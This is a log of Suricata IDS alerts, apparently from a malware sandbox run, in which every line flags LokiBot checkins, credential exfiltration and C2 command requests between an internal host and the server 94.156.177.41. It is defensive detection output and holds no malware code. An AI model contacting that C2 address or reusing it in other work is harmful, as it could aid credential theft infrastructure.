Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49718
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49824 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49824 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49824 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49721
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49724 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49724 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49751 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49851 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49751
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49801 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49801 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49785 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49771
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49727
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49851 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49851 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49801 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49726 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49726 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49824 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49714
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49877 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49791 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49877 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49791 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49791 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49877 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49882 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49882 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49882 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49851 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49801 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49733
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49785 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49791 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49833 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49833 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49833 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49833 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49724
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49726 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49897 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49739
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49791
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49902 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49781
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49785 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49882 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49785
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49882
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49833
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49897 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49877 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49867 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49867 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49840 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49867 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49840 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49840 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49715
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49840 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49902 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49797 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49797 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49797 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49897 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49928 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49928 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49928 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49867 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49726
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49801
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49928 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49797 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49936 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49806 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49948 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49757
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49897 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49845 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49902 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49845 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49936 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49902 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49928
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49897
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49862 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49902
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49862 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49797
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49954 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49954 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49954 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49851
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49954 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49908 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49862 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49954
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49948 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49806 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49806 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49877
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49829
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49857 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49768
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49857 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49840
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49857 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49908 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49970 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49970 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49984 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49970 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49984 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49984 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49871 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49862 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49845 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49970 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49984 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49942 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49970
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49845 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49959 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49959 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49959 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49948 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49942 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49942 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49959 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49948 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49908 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49948
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49871 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49871 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49908 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49871 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49806 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49908
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49862
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49936 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49979 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49845
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49979 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49979 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49942 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49979 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49979
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49871
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49867
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49936 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49959
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49888 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49942
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49888 -> 94.156.177.41:80
